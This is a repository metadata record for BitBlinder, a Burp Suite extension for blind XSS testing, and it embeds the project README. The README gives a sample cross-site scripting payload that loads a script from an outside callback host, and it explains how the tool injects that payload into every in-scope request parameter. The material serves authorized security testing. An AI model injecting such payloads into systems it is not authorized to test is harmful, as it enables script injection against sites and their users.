{"id":13542269,"url":"https://github.com/BitTheByte/BitBlinder","last_synced_at":"2025-04-02T09:33:28.198Z","repository":{"id":109046777,"uuid":"168034473","full_name":"BitTheByte/BitBlinder","owner":"BitTheByte","description":"BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities","archived":false,"fork":false,"pushed_at":"2023-06-04T18:55:35.000Z","size":13,"stargazers_count":107,"open_issues_count":3,"forks_count":23,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-11-03T07:33:15.572Z","etag":null,"topics":["burp-extensions","burp-plugin","burpsuite","burpsuite-extender","jython","python"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BitTheByte.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2019-01-28T20:45:39.000Z","updated_at":"2024-10-03T05:13:53.000Z","dependencies_parsed_at":"2023-04-05T23:33:41.699Z","dependency_job_id":null,"html_url":"https://github.com/BitTheByte/BitBlinder","commit_stats":{"total_commits":12,"total_committers":3,"mean_commits":4.0,"dds":"0.16666666666666663","last_synced_commit":"b1183cc37ee4ae3f8b432b87494889361d9de89c"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BitTheByte%2FBitBlinder","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BitTheByte%2FBitBlinder/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BitTheByte%2FBitBlinder/releases","manifests_url
":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BitTheByte%2FBitBlinder/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BitTheByte","download_url":"https://codeload.github.com/BitTheByte/BitBlinder/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246789309,"owners_count":20834273,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["burp-extensions","burp-plugin","burpsuite","burpsuite-extender","jython","python"],"created_at":"2024-08-01T10:01:03.711Z","updated_at":"2025-04-02T09:33:27.892Z","avatar_url":"https://github.com/BitTheByte.png","language":"Python","readme":"# BitBlinder\n\n**THIS TOOL IS IN EARLY BETA. USE IT AT YOUR OWN RISK**  \nBurp extension that helps find blind XSS vulnerabilities by injecting XSS payloads into every request that passes through BurpSuite\n```\n*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n-  Developer: Ahmed Ezzat (BitTheByte)      -\n-  Github:    https://github.com/BitTheByte -\n-  Version:   0.05b                         -\n*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n[WARNING] MAKE SURE TO EDIT THE SETTINGS BEFORE USE\n[WARNING] THIS TOOL WILL WORK FOR IN-SCOPE ITEMS ONLY\n[WARNING] THIS TOOL WILL CONSUME TOO MUCH BANDWIDTH\n```\n\n# Configuration\nGo to the `Bit blinder` tab, then enable it  \nSet your payloads (line separated)  \n```\n\"\u003e\u003cscript%20src=\"https://myusername.xss.ht\"\u003e\u003cscript\u003e\n\"\u003e\u003cscript%20src=\"https://myusername.xss.ht\"\u003e\u003cscript\u003e\n...\n```\nIf you add more than 1 payload, 
enable the randomization button  \nIf you keep it disabled, keep in mind that the tool will use the first payload only\n\n\n# How to use\n1. Load the extension into BurpSuite\n2. Click on the `Bit blinder` tab, then enable it  \n3. Add your target to scope **It'll only work for in-scope items**\n4. Continue your hunting session **Make sure to do a lot of actions [Forms,Search,...]**\n5. Monitor the output in the extension's output tab\n\n**Note:** By its nature, this tool makes a lot of requests, so you may get blocked by a WAF or experience a slow internet connection\n\n\n# In a nutshell\n\nWhen the user visits [https://example.com?vuln=123\u0026vuln2=abc](https://example.com?vuln=123\u0026vuln2=abc)  \nThis tool will generate the following 2 requests (in the background, without affecting the current session)  \n1. [https://example.com?vuln=[YOUR_XSS_PAYLOAD]\u0026vuln2=abc](https://example.com?vuln=[YOUR_XSS_PAYLOAD]\u0026vuln2=abc)\n2. [https://example.com?vuln=123\u0026vuln2=[YOUR_XSS_PAYLOAD]](https://example.com?vuln=123\u0026vuln2=[YOUR_XSS_PAYLOAD])\n\nThe previous example also applies to `POST` parameters\n\n\n# Current version\n```\nVersion 0.05b\n```\n\n\n# TO-DO (By priority)\n- GUI ✓ ( A very ugly one for now.. )\n- Fix endless request loops ✓\n- Injection in headers\n- Option to exclude parameters/hosts/endpoints\n- Better output/logging system\n","funding_links":[],"categories":["Exploitation","Vulnerability Specific Extensions","Python (1887)","Python"],"sub_categories":["XSS Injection","Cross-site scripting"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBitTheByte%2FBitBlinder","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FBitTheByte%2FBitBlinder","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBitTheByte%2FBitBlinder/lists"}